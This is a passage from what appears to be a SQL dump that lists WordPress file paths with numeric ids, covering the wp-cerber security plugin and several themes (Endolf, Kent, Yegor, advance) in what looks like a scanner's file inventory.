if'),(1570,'wp-content/plugins/wp-cerber/assets/flags/sl.gif'),(1571,'wp-content/plugins/wp-cerber/assets/flags/sm.gif'),(1572,'wp-content/plugins/wp-cerber/assets/flags/sn.gif'),(1573,'wp-content/plugins/wp-cerber/assets/flags/so.gif'),(1574,'wp-content/plugins/wp-cerber/assets/flags/sr.gif'),(1575,'wp-content/plugins/wp-cerber/assets/flags/ss.gif'),(1576,'wp-content/plugins/wp-cerber/assets/flags/st.gif'),(1577,'wp-content/plugins/wp-cerber/assets/flags/sv.gif'),(1578,'wp-content/plugins/wp-cerber/assets/flags/sx.gif'),(1579,'wp-content/plugins/wp-cerber/assets/flags/sy.gif'),(1580,'wp-content/plugins/wp-cerber/assets/flags/sz.gif'),(1581,'wp-content/plugins/wp-cerber/assets/flags/tc.gif'),(1582,'wp-content/plugins/wp-cerber/assets/flags/td.gif'),(1583,'wp-content/plugins/wp-cerber/assets/flags/tf.gif'),(1584,'wp-content/plugins/wp-cerber/assets/flags/tg.gif'),(1585,'wp-content/plugins/wp-cerber/assets/flags/th.gif'),(1586,'wp-content/plugins/wp-cerber/assets/flags/tj.gif'),(1587,'wp-content/plugins/wp-cerber/assets/flags/tk.gif'),(1588,'wp-content/plugins/wp-cerber/assets/flags/tl.gif'),(1589,'wp-content/plugins/wp-cerber/assets/flags/tm.gif'),(1590,'wp-content/plugins/wp-cerber/assets/flags/tn.gif'),(1591,'wp-content/plugins/wp-cerber/assets/flags/to.gif'),(1592,'wp-content/plugins/wp-cerber/assets/flags/tr.gif'),(1593,'wp-content/plugins/wp-cerber/assets/flags/tt.gif'),(1594,'wp-content/plugins/wp-cerber/assets/flags/tv.gif'),(1595,'wp-content/plugins/wp-cerber/assets/flags/tw.gif'),(1596,'wp-content/plugins/wp-cerber/assets/flags/tz.gif'),(1597,'wp-content/plugins/wp-cerber/assets/flags/ua.gif'),(1598,'wp-content/plugins/wp-cerber/assets/flags/ug.gif'),(1599,'wp-content/plugins/wp-cerber/assets/flags/um.gif'),(1600,'wp-content/plugins/wp-cerber/assets/flags/us.gif'),(1601,'wp-content/plugins/wp-cerber/assets/flags/uy.gif'),(1602,'wp-content/plugins/wp-cerber/assets/flags/uz.gif'),(1603,'wp-content/plugins/wp-cerber/assets/flags/va.gif'),(1604,'wp-content/plugins/wp-cerber/assets/flags/vc.gif'),(1605,'wp-content/plugins/wp-cerber/assets/flags/ve.gif'),(1606,'wp-content/plugins/wp-cerber/assets/flags/vg.gif'),(1607,'wp-content/plugins/wp-cerber/assets/flags/vi.gif'),(1608,'wp-content/plugins/wp-cerber/assets/flags/vn.gif'),(1609,'wp-content/plugins/wp-cerber/assets/flags/vu.gif'),(1610,'wp-content/plugins/wp-cerber/assets/flags/wf.gif'),(1611,'wp-content/plugins/wp-cerber/assets/flags/ws.gif'),(1612,'wp-content/plugins/wp-cerber/assets/flags/ye.gif'),(1613,'wp-content/plugins/wp-cerber/assets/flags/yt.gif'),(1614,'wp-content/plugins/wp-cerber/assets/flags/za.gif'),(1615,'wp-content/plugins/wp-cerber/assets/flags/zm.gif'),(1616,'wp-content/plugins/wp-cerber/assets/flags/zw.gif'),(1617,'wp-content/plugins/wp-cerber/assets/goo-translate.png'),(1618,'wp-content/plugins/wp-cerber/assets/icons/style.css'),(1619,'wp-content/plugins/wp-cerber/assets/inspector.png'),(1620,'wp-content/plugins/wp-cerber/assets/magnific/LICENSE'),(1621,'wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js'),(1622,'wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css'),(1623,'wp-content/plugins/wp-cerber/assets/multi/license.txt'),(1624,'wp-content/plugins/wp-cerber/assets/multi/multi.css'),(1625,'wp-content/plugins/wp-cerber/assets/multi/multi.js'),(1626,'wp-content/plugins/wp-cerber/assets/multi/multi.min.js'),(1627,'wp-content/plugins/wp-cerber/assets/nexus.css'),(1628,'wp-content/plugins/wp-cerber/assets/rateit.png'),(1629,'wp-content/plugins/wp-cerber/assets/rateit2.png'),(1630,'wp-content/plugins/wp-cerber/assets/scanner.js'),(1631,'wp-content/plugins/wp-cerber/assets/select2/LICENSE.md'),(1632,'wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css'),(1633,'wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js'),(1634,'wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js'),(1635,'wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js'),(1636,'wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css'),(1637,'wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css'),(1638,'wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css'),(1639,'wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js'),(1640,'wp-content/plugins/wp-cerber/assets/ui-stack.css'),(1641,'wp-content/plugins/wp-cerber/assets/ui-stack.js'),(1642,'wp-content/plugins/wp-cerber/assets/wp-admin.js'),(1643,'wp-content/plugins/wp-cerber/assets/wrench.png'),(1644,'wp-content/plugins/wp-cerber/cerber-2fa.php'),(1645,'wp-content/plugins/wp-cerber/cerber-addons.php'),(1646,'wp-content/plugins/wp-cerber/cerber-common.php'),(1647,'wp-content/plugins/wp-cerber/cerber-ds.php'),(1648,'wp-content/plugins/wp-cerber/cerber-lab.php'),(1649,'wp-content/plugins/wp-cerber/cerber-load.php'),(1650,'wp-content/plugins/wp-cerber/cerber-maintenance.php'),(1651,'wp-content/plugins/wp-cerber/cerber-pluggable.php'),(1652,'wp-content/plugins/wp-cerber/cerber-request.php'),(1653,'wp-content/plugins/wp-cerber/cerber-ripe.php'),(1654,'wp-content/plugins/wp-cerber/cerber-scanner.php'),(1655,'wp-content/plugins/wp-cerber/cerber-settings.php'),(1656,'wp-content/plugins/wp-cerber/cerber-whois.php'),(1657,'wp-content/plugins/wp-cerber/changelog.txt'),(1658,'wp-content/plugins/wp-cerber/index.php'),(1659,'wp-content/plugins/wp-cerber/jetflow.php'),(1660,'wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php'),(1661,'wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php'),(1662,'wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php'),(1663,'wp-content/plugins/wp-cerber/nexus/cerber-nexus.php'),(1664,'wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php'),(1665,'wp-content/plugins/wp-cerber/readme.txt'),(1666,'wp-content/plugins/wp-cerber/wp-cerber.php'),(1667,'wp-content/themes/Endolf/404.php'),(1668,'wp-content/themes/Endolf/FT/FT_scope.php'),(1669,'wp-content/themes/Endolf/FT/colors.php'),(1670,'wp-content/themes/Endolf/FT/inc/lessc.php'),(1671,'wp-content/themes/Endolf/FT/js/colorset.js'),(1672,'wp-content/themes/Endolf/FT/js/jquery.minicolors.min.js'),(1673,'wp-content/themes/Endolf/FT/license-html.php'),(1674,'wp-content/themes/Endolf/FT/options/banners.php'),(1675,'wp-content/themes/Endolf/FT/options/options.php'),(1676,'wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-framework-admin.php'),(1677,'wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-framework.php'),(1678,'wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-interface.php'),(1679,'wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-media-uploader.php'),(1680,'wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-sanitization.php'),(1681,'wp-content/themes/Endolf/FT/plugin/options-framework/js/media-uploader.js'),(1682,'wp-content/themes/Endolf/FT/plugin/options-framework/js/options-custom.js'),(1683,'wp-content/themes/Endolf/FT/plugin/options-framework/options-framework.php'),(1684,'wp-content/themes/Endolf/FT/plugin/updater.php'),(1685,'wp-content/themes/Endolf/aq_resizer.php'),(1686,'wp-content/themes/Endolf/archive.php'),(1687,'wp-content/themes/Endolf/bootstrap/bootstrap.min.js'),(1688,'wp-content/themes/Endolf/comments.php'),(1689,'wp-content/themes/Endolf/content-none.php'),(1690,'wp-content/themes/Endolf/content-page.php'),(1691,'wp-content/themes/Endolf/content-search.php'),(1692,'wp-content/themes/Endolf/content-single.php'),(1693,'wp-content/themes/Endolf/content.php'),(1694,'wp-content/themes/Endolf/css/custom.php'),(1695,'wp-content/themes/Endolf/footer.php'),(1696,'wp-content/themes/Endolf/ft-options.php'),(1697,'wp-content/themes/Endolf/functions.php'),(1698,'wp-content/themes/Endolf/guide.php'),(1699,'wp-content/themes/Endolf/header.php'),(1700,'wp-content/themes/Endolf/homepage.php'),(1701,'wp-content/themes/Endolf/inc/breadcrumbs.php'),(1702,'wp-content/themes/Endolf/inc/category-gallery-widget.php'),(1703,'wp-content/themes/Endolf/inc/category-news-widget.php'),(1704,'wp-content/themes/Endolf/inc/extras.php'),(1705,'wp-content/themes/Endolf/inc/featured.php'),(1706,'wp-content/themes/Endolf/inc/paginate.php'),(1707,'wp-content/themes/Endolf/inc/promoted.php'),(1708,'wp-content/themes/Endolf/inc/sidebar-tab-widget.php'),(1709,'wp-content/themes/Endolf/inc/template-tags.php'),(1710,'wp-content/themes/Endolf/inc/ticker.php'),(1711,'wp-content/themes/Endolf/index.php'),(1712,'wp-content/themes/Endolf/js/custom.js'),(1713,'wp-content/themes/Endolf/js/jquery.flexslider.js'),(1714,'wp-content/themes/Endolf/js/navigation.js'),(1715,'wp-content/themes/Endolf/js/skip-link-focus-fix.js'),(1716,'wp-content/themes/Endolf/js/tinynav.js'),(1717,'wp-content/themes/Endolf/js/vticker.js'),(1718,'wp-content/themes/Endolf/page.php'),(1719,'wp-content/themes/Endolf/search.php'),(1720,'wp-content/themes/Endolf/sidebar.php'),(1721,'wp-content/themes/Endolf/single.php'),(1722,'wp-content/themes/Endolf/sponsors.php'),(1723,'wp-content/themes/Kent/404.php'),(1724,'wp-content/themes/Kent/FT/FT_scope.php'),(1725,'wp-content/themes/Kent/FT/colors.php'),(1726,'wp-content/themes/Kent/FT/inc/lessc.php'),(1727,'wp-content/themes/Kent/FT/js/colorset.js'),(1728,'wp-content/themes/Kent/FT/js/jquery.minicolors.min.js'),(1729,'wp-content/themes/Kent/FT/license-html.php'),(1730,'wp-content/themes/Kent/FT/options/banners.php'),(1731,'wp-content/themes/Kent/FT/options/options.php'),(1732,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-framework-admin.php'),(1733,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-framework.php'),(1734,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-interface.php'),(1735,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-media-uploader.php'),(1736,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-sanitization.php'),(1737,'wp-content/themes/Kent/FT/plugin/options-framework/js/media-uploader.js'),(1738,'wp-content/themes/Kent/FT/plugin/options-framework/js/options-custom.js'),(1739,'wp-content/themes/Kent/FT/plugin/options-framework/options-framework.php'),(1740,'wp-content/themes/Kent/FT/plugin/updater.php'),(1741,'wp-content/themes/Kent/aq_resizer.php'),(1742,'wp-content/themes/Kent/archive.php'),(1743,'wp-content/themes/Kent/comments.php'),(1744,'wp-content/themes/Kent/content-page.php'),(1745,'wp-content/themes/Kent/content-single.php'),(1746,'wp-content/themes/Kent/content.php'),(1747,'wp-content/themes/Kent/footer.php'),(1748,'wp-content/themes/Kent/ft-options.php'),(1749,'wp-content/themes/Kent/functions.php'),(1750,'wp-content/themes/Kent/guide.php'),(1751,'wp-content/themes/Kent/header.php'),(1752,'wp-content/themes/Kent/inc/paginate.php'),(1753,'wp-content/themes/Kent/inc/template-tags.php'),(1754,'wp-content/themes/Kent/index.php'),(1755,'wp-content/themes/Kent/js/custom.js'),(1756,'wp-content/themes/Kent/js/html5.js'),(1757,'wp-content/themes/Kent/js/jquery.flexslider.js'),(1758,'wp-content/themes/Kent/js/superfish.js'),(1759,'wp-content/themes/Kent/no-results.php'),(1760,'wp-content/themes/Kent/page.php'),(1761,'wp-content/themes/Kent/search.php'),(1762,'wp-content/themes/Kent/searchform.php'),(1763,'wp-content/themes/Kent/sidebar.php'),(1764,'wp-content/themes/Kent/single.php'),(1765,'wp-content/themes/Kent/slider.php'),(1766,'wp-content/themes/Kent/sponsors.php'),(1767,'wp-content/themes/Kent/tabs.php'),(1768,'wp-content/themes/Kent/timthumb.php'),(1769,'wp-content/themes/Yegor/404.php'),(1770,'wp-content/themes/Yegor/FT/FT_scope.php'),(1771,'wp-content/themes/Yegor/FT/colors.php'),(1772,'wp-content/themes/Yegor/FT/inc/lessc.php'),(1773,'wp-content/themes/Yegor/FT/js/colorset.js'),(1774,'wp-content/themes/Yegor/FT/js/jquery.minicolors.min.js'),(1775,'wp-content/themes/Yegor/FT/license-html.php'),(1776,'wp-content/themes/Yegor/FT/options/banners.php'),(1777,'wp-content/themes/Yegor/FT/options/options.php'),(1778,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-framework-admin.php'),(1779,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-framework.php'),(1780,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-interface.php'),(1781,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-media-uploader.php'),(1782,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-sanitization.php'),(1783,'wp-content/themes/Yegor/FT/plugin/options-framework/js/media-uploader.js'),(1784,'wp-content/themes/Yegor/FT/plugin/options-framework/js/options-custom.js'),(1785,'wp-content/themes/Yegor/FT/plugin/options-framework/options-framework.php'),(1786,'wp-content/themes/Yegor/FT/plugin/updater.php'),(1787,'wp-content/themes/Yegor/aq_resizer.php'),(1788,'wp-content/themes/Yegor/archive.php'),(1789,'wp-content/themes/Yegor/bootstrap/bootstrap.min.js'),(1790,'wp-content/themes/Yegor/comments.php'),(1791,'wp-content/themes/Yegor/content-page.php'),(1792,'wp-content/themes/Yegor/content-single.php'),(1793,'wp-content/themes/Yegor/content.php'),(1794,'wp-content/themes/Yegor/footer.php'),(1795,'wp-content/themes/Yegor/ft-options.php'),(1796,'wp-content/themes/Yegor/functions.php'),(1797,'wp-content/themes/Yegor/guide.php'),(1798,'wp-content/themes/Yegor/header.php'),(1799,'wp-content/themes/Yegor/inc/carousal.php'),(1800,'wp-content/themes/Yegor/inc/extras.php'),(1801,'wp-content/themes/Yegor/inc/paginate.php'),(1802,'wp-content/themes/Yegor/inc/tabs.php'),(1803,'wp-content/themes/Yegor/inc/template-tags.php'),(1804,'wp-content/themes/Yegor/index.php'),(1805,'wp-content/themes/Yegor/js/custom.js'),(1806,'wp-content/themes/Yegor/js/flexslider.js'),(1807,'wp-content/themes/Yegor/js/jquery.carouFredSel-6.2.1-packed.js'),(1808,'wp-content/themes/Yegor/js/mobilemenu.js'),(1809,'wp-content/themes/Yegor/js/navigation.js'),(1810,'wp-content/themes/Yegor/no-results.php'),(1811,'wp-content/themes/Yegor/page.php'),(1812,'wp-content/themes/Yegor/search.php'),(1813,'wp-content/themes/Yegor/searchform.php'),(1814,'wp-content/themes/Yegor/sidebar.php'),(1815,'wp-content/themes/Yegor/single.php'),(1816,'wp-content/themes/Yegor/sponsors.php'),(1817,'wp-content/themes/advance/404.php'),(1818,'wp-content/themes/advance/archive.php'),(1819,'wp-content/themes/advance/author.php'),(1820,'wp-content/themes/advance/category.php'),(1821,'wp-content/themes/advance/comments.php'),(1822,'wp-content/themes/advance/content-none.php'),(1823,'wp-content/themes/advance/content-single.php'),(1824,'wp-content/themes/advance/content.php'),(1825,'wp-content/themes/advance/css/advance-mobile.css'),(1826,'wp-content/themes/advance/css/advance_widgets_custom_css.css'),(1827,'wp-content/themes/advance/css/animate.css'),(1828,'wp-content/themes/advance/css/customcss/body_layout.css'),(1829,'wp-content/themes/advance/css/customcss/header_checkbox.css'),(1830,'wp-content/themes/advance/css/customcss/mobile_sidebar.css'),(1831,'wp-content/themes/advance/css/customcss/mobile_slider.css'),(1832,'wp-content/themes/advance/css/customcss/sticky_menu.css'),(1833,'wp-content/themes/advance/css/foundation.css'),(1834,'wp-content/themes/advance/css/jquery.sidr.dark.css'),(1835,'wp-content/themes/advance/css/preloder.css'),(1836,'wp-content/themes/advance/css/unminified/animate.css'),(1837,'wp-content/themes/advance/css/unminified/foundation.css'),(1838,'wp-content/themes/advance/css/unminified/jquery.sidr.dark.css'),(1839,'wp-content/themes/advance/css/unminified/normalize.css'),(1840,'wp-content/themes/advance/css/welcome-page.css'),(1841,'wp-content/themes/advance/footer/part-footer1.php'),(1842,'wp-content/themes/advance/footer.php'),(1843,'wp-content/themes/advance/front-page.php'),(1844,'wp-content/themes/advance/functions.php'),(1845,'wp-content/themes/advance/header.php'),(1846,'wp-content/themes/advance/headers/part-head1.php'),(1847,'wp-content/themes/advance/headers/part-headsingle.php'),(1848,'wp-content/themes/advance/images/big-shadow.png'),(1849,'wp-content/themes/advance/images/blank1.jpg'),(1850,'wp-content/themes/advance/images/ico-delete.png'),(1851,'wp-content/themes/advance/images/lay_hover.png'),(1852,'wp-content/themes/advance/images/link.png'),(1853,'wp-content/themes/advance/images/list_type.png'),(1854,'wp-content/themes/advance/images/logosaf.png'),(1855,'wp-content/themes/advance/images/rps_arrows.png'),(1856,'wp-content/themes/advance/images/search.png'),(1857,'wp-content/themes/advance/images/sep-shadow.png'),(1858,'wp-content/themes/advance/images/shadow.png'),(1859,'wp-content/themes/advance/images/slider.jpg'),(1860,'wp-content/themes/advance/images/ui.totop.png'),(1861,'wp-content/themes/advance/images/work_img1.jpg'),(1862,'wp-content/themes/advance/inc/admin/img/1.png'),(1863,'wp-content/themes/advance/inc/admin/img/2.png'),(1864,'wp-content/themes/advance/inc/admin/img/3.png'),(1865,'wp-content/themes/advance/inc/admin/img/fron-widgest.jpg'),(1866,'wp-content/themes/advance/inc/admin/img/service.jpg'),(1867,'wp-content/themes/advance/inc/admin/welcome-screen/sections/getting-started.php'),(1868,'wp-content/themes/advance/inc/admin/welcome-screen/welcome-screen.php'),(1869,'wp-content/themes/advance/inc/customizer/config.php'),(1870,'wp-content/themes/advance/inc/customizer/fields.php'),(1871,'wp-content/themes/advance/inc/customizer/panels.php'),(1872,'wp-content/themes/advance/inc/customizer/sections.php'),(1873,'wp-content/themes/advance/inc/customizer.php'),(1874,'wp-content/themes/advance/inc/images/cross.png'),(1875,'wp-content/themes/advance/inc/images/ico-delete.png'),(1876,'wp-content/themes/advance/inc/images/layout1.png'),(1877,'wp-content/themes/advance/inc/images/layout2.png'),(1878,'wp-content/themes/advance/inc/images/tick.png'),(1879,'wp-content/themes/advance/inc/kirki/Gruntfile.js'),(1880,'wp-content/themes/advance/inc/kirki/LICENSE'),(1881,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-colors.php'),(1882,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-width.php'),(1883,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css.php'),(1884,'wp-content/themes/advance/inc/kirki/assets/css/customizer.css'),(1885,'wp-content/themes/advance/inc/kirki/assets/css/customizer.css.map'),(1886,'wp-content/themes/advance/inc/kirki/assets/css/hint.css'),(1887,'wp-content/themes/advance/inc/kirki/assets/css/kirki-styles.css'),(1888,'wp-content/themes/advance/inc/kirki/assets/css/select2.min.css'),(1889,'wp-content/themes/advance/inc/kirki/assets/css/transparency-grid.png'),(1890,'wp-content/themes/advance/inc/kirki/assets/images/1c.png'),(1891,'wp-content/themes/advance/inc/kirki/assets/images/2cl.png'),(1892,'wp-content/themes/advance/inc/kirki/assets/images/2cr.png'),(1893,'wp-content/themes/advance/inc/kirki/assets/images/3cl.png'),(1894,'wp-content/themes/advance/inc/kirki/assets/images/3cm.png'),(1895,'wp-content/themes/advance/inc/kirki/assets/images/3cr.png'),(1896,'wp-content/themes/advance/inc/kirki/assets/images/jquery.fs.stepper-arrows.png'),(1897,'wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.png'),(1898,'wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.svg'),(1899,'wp-content/themes/advance/inc/kirki/assets/images/kirki-logo.svg'),(1900,'wp-content/themes/advance/inc/kirki/assets/images/kirki-toolkit.png'),(1901,'wp-content/themes/advance/inc/kirki/assets/js/branding.js'),(1902,'wp-content/themes/advance/inc/kirki/assets/js/controls/checkbox.js'),(1903,'wp-content/themes/advance/inc/kirki/assets/js/controls/code.js'),(1904,'wp-content/themes/advance/inc/kirki/assets/js/controls/color-palette.js'),(1905,'wp-content/themes/advance/inc/kirki/assets/js/controls/color.js'),(1906,'wp-content/themes/advance/inc/kirki/assets/js/controls/custom.js'),(1907,'wp-content/themes/advance/inc/kirki/assets/js/controls/dashicons.js'),(1908,'wp-content/themes/advance/inc/kirki/assets/js/controls/date.js'),(1909,'wp-content/themes/advance/inc/kirki/assets/js/controls/dimension.js'),(1910,'wp-content/themes/advance/inc/kirki/assets/js/controls/dropdown-pages.js'),(1911,'wp-content/themes/advance/inc/kirki/assets/js/controls/editor.js'),(1912,'wp-content/themes/advance/inc/kirki/assets/js/controls/generic.js'),(1913,'wp-content/themes/advance/inc/kirki/assets/js/controls/multicheck.js'),(1914,'wp-content/themes/advance/inc/kirki/assets/js/controls/multicolor.js'),(1915,'wp-content/themes/advance/inc/kirki/assets/js/controls/number.js'),(1916,'wp-content/themes/advance/inc/kirki/assets/js/controls/palette.js'),(1917,'wp-content/themes/advance/inc/kirki/assets/js/controls/preset.js'),(1918,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio-buttonset.js'),(1919,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio-image.js'),(1920,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio.js'),(1921,'wp-content/themes/advance/inc/kirki/assets/js/controls/repeater.js'),(1922,'wp-content/themes/advance/inc/kirki/assets/js/controls/select.js'),(1923,'wp-content/themes/advance/inc/kirki/assets/js/controls/slider.js'),(1924,'wp-content/themes/advance/inc/kirki/assets/js/controls/sortable.js'),(1925,'wp-content/themes/advance/inc/kirki/assets/js/controls/spacing.js'),(1926,'wp-content/themes/advance/inc/kirki/assets/js/controls/switch.js'),(1927,'wp-content/themes/advance/inc/kirki/assets/js/controls/toggle.js'),(1928,'wp-content/themes/advance/inc/kirki/assets/js/controls/typography.js'),(1929,'wp-content/themes/advance/inc/kirki/assets/js/functions/set-setting-value.js'),(1930,'wp-content/themes/advance/inc/kirki/assets/js/functions/validate-css-value.js'),(1931,'wp-content/themes/advance/inc/kirki/assets/js/l10n.js'),(1932,'wp-content/themes/advance/inc/kirki/assets/js/postmessage.js'),(1933,'wp-content/themes/advance/inc/kirki/assets/js/reset.js'),(1934,'wp-content/themes/advance/inc/kirki/assets/js/tooltip.js'),(1935,'wp-content/themes/advance/inc/kirki/assets/js/vendor/selectize.js'),(1936,'wp-content/themes/advance/inc/kirki/assets/js/vendor/serialize.js'),(1937,'wp-content/themes/advance/inc/kirki/assets/js/vendor/tinymce.plugin.code.js'),(1938,'wp-content/themes/advance/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js'),(1939,'wp-content/themes/advance/inc/kirki/assets/scss/controls/checkbox.scss'),(1940,'wp-content/themes/advance/inc/kirki/assets/scss/controls/code.scss'),(1941,'wp-content/themes/advance/inc/kirki/assets/scss/controls/color-palette.scss'),(1942,'wp-content/themes/advance/inc/kirki/assets/scss/controls/color.scss'),(1943,'wp-content/themes/advance/inc/kirki/assets/scss/controls/dashicons.scss'),(1944,'wp-content/themes/advance/inc/kirki/assets/scss/controls/date.scss'),(1945,'wp-content/themes/advance/inc/kirki/assets/scss/controls/dimension.scss'),(1946,'wp-content/themes/advance/inc/kirki/assets/scss/controls/editor.scss'),(1947,'wp-content/themes/advance/inc/kirki/assets/scss/controls/generic.scss'),(1948,'wp-content/themes/advance/inc/kirki/assets/scss/controls/multicheck.scss'),(1949,'wp-content/themes/advance/inc/kirki/assets/scss/controls/multicolor.scss'),(1950,'wp-content/themes/advance/inc/kirki/assets/scss/controls/number.scss'),(1951,'wp-content/themes/advance/inc/kirki/assets/scss/controls/palette.scss'),(1952,'wp-content/themes/advance/inc/kirki/assets/scss/controls/radio-buttonset.scss'),(1953,'wp-content/themes/advance/inc/kirki/assets/scss/controls/radio-image.scss'),(1954,'wp-content/themes/advance/inc/kirki/assets/scss/controls/radio.scss'),(1955,'wp-content/themes/advance/inc/kirki/assets/scss/controls/repeater.scss'),(1956,'wp-content/themes/advance/inc/kirki/assets/scss/controls/select.scss'),(1957,'wp-content/themes/advance/inc/kirki/assets/scss/controls/slider.scss'),(1958,'wp-content/themes/advance/inc/kirki/assets/scss/controls/sortable.scss'),(1959,'wp-content/themes/advance/inc/kirki/assets/scss/controls/spacing.scss'),(1960,'wp-content/themes/advance/inc/kirki/assets/scss/controls/switch.scss'),(1961,'wp-content/themes/advance/inc/kirki/assets/scss/controls/toggle.scss'),(1962,'wp-content/themes/advance/inc/kirki/assets/scss/controls/typography.scss'),(1963,'wp-content/themes/advance/inc/kirki/assets/scss/customizer.scss'),(1964,'wp-content/themes/advance/inc/kirki/assets/scss/global.scss'),(1965,'wp-content/themes/advance/inc/kirki/assets/scss/panels/expanded.scss'),(1966,'wp-content/themes/advance/inc/kirki/assets/scss/sections/expanded.scss'),(1967,'wp-content/themes/advance/inc/kirki/assets/scss/sections/hover.scss'),(1968,'wp-content/themes/advance/inc/kirki/assets/scss/tooltips.scss'),(1969,'wp-content/themes/advance/inc/kirki/autoloader.php'),(1970,'wp-content/themes/advance/inc/kirki/composer.json'),(1971,'wp-content/themes/advance/inc/kirki/includes/class-kirki-active-callback.php'),(1972,'wp-content/themes/advance/inc/kirki/includes/class-kirki-config.php'),(1973,'wp-content/themes/advance/inc/kirki/includes/class-kirki-control.php'),(1974,'wp-content/themes/advance/inc/kirki/includes/class-kirki-customize-control.php'),(1975,'wp-content/themes/advance/inc/kirki/includes/class-kirki-enqueue.php'),(1976,'wp-content/themes/advance/inc/kirki/includes/class-kirki-explode-background-field.php'),(1977,'wp-content/themes/advance/inc/kirki/includes/class-kirki-field.php'),(1978,'wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts-google.php'),(1979,'wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts.php'),(1980,'wp-content/themes/advance/inc/kirki/includes/class-kirki-helper.php'),(1981,'wp-content/themes/advance/inc/kirki/includes/class-kirki-init.php'),(1982,'wp-content/themes/advance/inc/kirki/includes/class-kirki-l10n.php'),(1983,'wp-content/themes/advance/inc/kirki/includes/class-kirki-panel.php'),(1984,'wp-content/themes/advance/inc/kirki/includes/class-kirki-sanitize-values.php'),(1985,'wp-content/themes/advance/inc/kirki/includes/class-kirki-scripts-registry.php'),(1986,'wp-content/themes/advance/inc/kirki/includes/class-kirki-section.php'),(1987,'wp-content/themes/advance/inc/kirki/includes/class-kirki-selective-refresh.php'),(1988,'wp-content/themes/advance/inc/kirki/includes/class-kirki-settings.php'),(1989,'wp-content/themes/advance/inc/kirki/includes/class-kirki-toolkit.php'),(1990,'wp-content/themes/advance/inc/kirki/includes/class-kirki-values.php'),(1991,'wp-content/themes/advance/inc/kirki/includes/class-kirki.php'),(1992,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php'),(1993,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-code-control.php'),(1994,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-control.php'),(1995,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php'),(1996,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-custom-control.php'),(1997,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php'),(1998,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-date-control.php'),(1999,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php'),(2000,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php'),(2001,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-editor-control.php'),(2002,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-generic-control.php'),(2003,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php'),(2004,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php'),(2005,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-number-control.php'),(2006,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-palette-control.php'),(2007,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-preset-control.php'),(2008,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php'),(2009,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-control.php'),(2010,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php'),(2011,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php'),(2012,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-select-control.php'),(2013,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-slider-control.php'),(2014,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php'),(2015,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php'),(2016,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-switch-control.php'),(2017,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php'),(2018,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-typography-control.php'),(2019,'wp-content/themes/advance/inc/kirki/